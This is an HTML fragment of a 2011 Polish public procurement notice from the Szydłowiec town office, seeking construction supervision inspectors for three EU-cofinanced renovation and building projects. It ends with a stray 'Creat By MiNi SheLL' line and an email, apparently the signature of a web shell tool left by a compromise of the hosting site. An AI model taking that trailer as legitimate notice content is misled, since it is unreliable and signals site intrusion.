<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający podpisze umowę z wykonawcą, który przedłoży najkorzystniejszą ofertę z punktu widzenia kryteriów przyjętych w niniejszej specyfikacji. Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie.
2. Postanowienia umowy zawarto w projekcie umowy, który stanowi załącznik nr 8 do SIWZ.
3. Przed zawarciem umowy Wykonawca będzie zobowiązany do przedłożenia:
 - dokumentów określających sposób i osoby uprawnione do reprezentowania Wykonawcy,
 - w przypadku zadania Nr 1 i Nr 3: uprawnień budowlanych spełniających warunki rozporządzenia z dnia 9  czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. nr 150 poz.1590) ;
- w przypadku udzielenia zamówienia konsorcjum (tzn. Wykonawcy określonemu w art. 23 ust. 1 Ustawy) - umowy regulującej współpracę tych Wykonawców, a w przypadku wspólników prowadzących działalność gospodarczą w formie spółki cywilnej - umowę spółki.
4.  Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
- zmiany terminu wykonywania zamówienia, wraz z odpowiadającą mu zmianą wynagrodzenia, w przypadku zmiany terminu obowiązywania umowy na roboty budowlane, w tym także na skutek wystąpienia siły wyższej.	
 - w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
1) zmiany inspektora nadzoru inwestorskiego na skutek zdarzeń losowych, utraty wymaganych uprawnień, utraty stanowiska  z zastrzeżeniem równoważności uprawnień,
2) zmiany przepisów prawa  istotnych dla  postanowień  zawartej umowy, w szczególności zmiany stawki podatku VAT. 
5. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy  z przyczyn, o których mowa w pkt. 4 SIWZ, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o  dokonanie wskazanej zmiany.
6. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
7. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie  strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
8. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest   dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szydlowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szydłowcu
Wydział Zagospodarowania Przestrzennego i Inwestycji
ul. Kilińskiego 2
26-500 Szydłowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 12:00, miejsce: Urząd Miejski w Szydłowcu
Rynek Wielki 1
26-500 Szydłowiec
pok. 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadania realizowane w ramach projektu Odnowa zabytkowych obiektów i przestrzeni publicznej w Szydłowcu, poprawa funkcjonalności i dostępności Infrastruktury kulturalnej i  turystycznej dla mieszkańców Mazowsza współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego, Priorytet V Wzmacnianie Roli Miast w Rozwoju Regionu Działanie 5.2 Rewitalizacja Miast Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego pn. Wykonanie  remontu i kolorystki elewacji, osuszenia murów przyziemia Ratusza w Szydłowcu oraz adaptacja balkonu wieży Ratusza z przeznaczeniem na galerię widokową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego pn. Wykonanie  remontu i kolorystki elewacji, osuszenia murów przyziemia Ratusza w Szydłowcu oraz adaptacja balkonu wieży Ratusza z przeznaczeniem na galerię widokową obejmującego n/w roboty:
1. Wykonanie osuszenia murów przyziemia poprzez wykonanie przepony na wysokości min. 35 cm powyżej poziomu posadzki piwnic metodą iniekcji - izolacji odcinającej możliwość podciągania kapilarnego;
2. Remont elewacji i wykonanie kolorystyki polegający na wymianie tynków zewnętrznych z uwzględnieniem wzmocnienia ścian kotwami w miejscach pęknięć.
3. Adaptację balkonu wieży ratuszowej na platformę widokową obejmującą remont nawierzchni balkonu, wykonanie balustrady i zabezpieczenia w postaci osiatkowania.
4. Remont konstrukcji dachowej polegający na zabezpieczeniu elementów więźby środkami grzybobójczymi oraz środkami ogniochronnymi, wzmocnieniu elementów konstrukcyjnych bądź ich wymianie.
5. Remont schodów zewnętrznych - wykonanie nowych schodów.
6. Remont studzienek doświetlających okna piwniczne obejmujący ich rozbiórkę oraz odtworzenie przy użyciu nowych materiałów.
7. Wykonanie opaski wokół budynku.
8. Wykonanie obróbek blacharskich.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacją techniczną wykonania i odbioru robót, z projektem budowlanym, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branży konstrukcyjno-budowlanej wraz z nadzorem robót budowlanych na obiektach zabytkowych nieruchomych:
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych;
sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych;
czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 966.583,61 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Budowa budynku Regionalnego Centrum Biblioteczno - Multimedialnego w Szydłowcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Budowa budynku Regionalnego Centrum Biblioteczno - Multimedialnego w Szydłowcu obejmującego n/w roboty:
1. Rozbiórkę istniejącego budynku wraz z demontażem istniejących przyłączy.
2. Wykonanie fundamentów, ścian zewnętrznych i wewnętrznych wraz z wykonaniem tynków wewnętrznych.
3. Wykonanie stropów i stropodachu.
4. Wykonanie docieplenia ścian zewnętrznych styropianem wraz z wyprawa elewacyjną cienkowarstwową.
5. Wykonanie docieplenia stropodachu styropianem oraz pokrycia dachu papą termozgrzewalną.
6. Wykonanie instalacji elektrycznej, wodno-kanalizacyjnej, centralnego ogrzewania, wentylacji nawiewno wywiewnej, klimatyzacji, wykonanie przeciwpożarowego systemu alarmowego.
7. Montaż windy, stolarki okiennej i drzwiowej, wyposażenia wewnętrznego.
8. Wykonanie zagospodarowania terenu wraz z przebudową istniejących miejsc postojowych.
9. Wykonanie przyłącza wodno - kanalizacyjnego i ciepłowniczego.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót, z projektami budowlanymi, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branżach:
konstrukcyjno-budowlanej;
instalacyjno-sanitarnej w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacyjnych;
instalacyjno-elektrycznej   w   zakresie   sieci,   instalacji   i   urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych;
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych;
sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych;
czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją oraz uczestniczenie w przeprowadzanych próbach i odbiorach technicznych instalacji i urządzeń;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
obecność branżowych inspektorów nadzoru na każde wezwanie Inspektora nadzoru lub Zamawiającego nie później niż w dniu następnym od daty wezwania oraz w trakcie realizacji nadzorowanych przez nich robót branżowych zaplanowanych w harmonogramie rzeczowo-finansowym w zależności od potrzeby, w okresach uzgodnionych przez inspektora wiodącego z inspektorami branżowymi (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 1.898.300,77 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Rozbudowa, przebudowa i modernizacja budynku Pod Dębem w Szydłowcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Rozbudowa, przebudowa i modernizacja budynku Pod Dębem w Szydłowcu obejmującego n/w roboty:
1. Rozbudowę istniejącego budynku.
2. Renowację istniejących murów fundamentowych poprzez usunięcie wody kapilarnej metodą iniekcji ciśnieniowej.
3. Wykonanie podbicia istniejących fundamentów wraz z izolacjami przeciwwilgociowymi z papy zgrzewalnej.
4. Naprawę uszkodzonych miejsc w ścianach.
5. Wymianę stropów oraz więźby dachowej na istniejącym budynku. 
6. Pokrycie dachów nieodeskowanych dachówką ceramiczną.
7. Montaż stolarki okiennej i drzwiowej.
8. Wykonanie instalacji elektrycznej, wodno - kanalizacyjnej, wentylacji, centralnego ogrzewania, teletechnicznej
9. Wykonanie przyłączy wodociągowego, kanalizacji sanitarnej, ciepłowniczego.
10. Przebudowę stacji transformatorowej.
11. Wykonanie zagospodarowania terenu.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót, z projektami budowlanymi, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branżach:
konstrukcyjno-budowlanej wraz z nadzorem robót budowlanych na obiektach zabytkowych nieruchomych;
instalacyjno-sanitarnej w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacyjnych;
instalacyjno-elektrycznej   w   zakresie   sieci,   instalacji   i   urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych;
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych;
sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych;
czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją oraz uczestniczenie w przeprowadzanych próbach i odbiorach technicznych instalacji i urządzeń;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
obecność branżowych inspektorów nadzoru na każde wezwanie Inspektora nadzoru lub Zamawiającego nie później niż w dniu następnym od daty wezwania oraz w trakcie realizacji nadzorowanych przez nich robót branżowych zaplanowanych w harmonogramie rzeczowo-finansowym w zależności od potrzeby, w okresach uzgodnionych przez inspektora wiodącego z inspektorami branżowymi (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 3.671.481,66 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com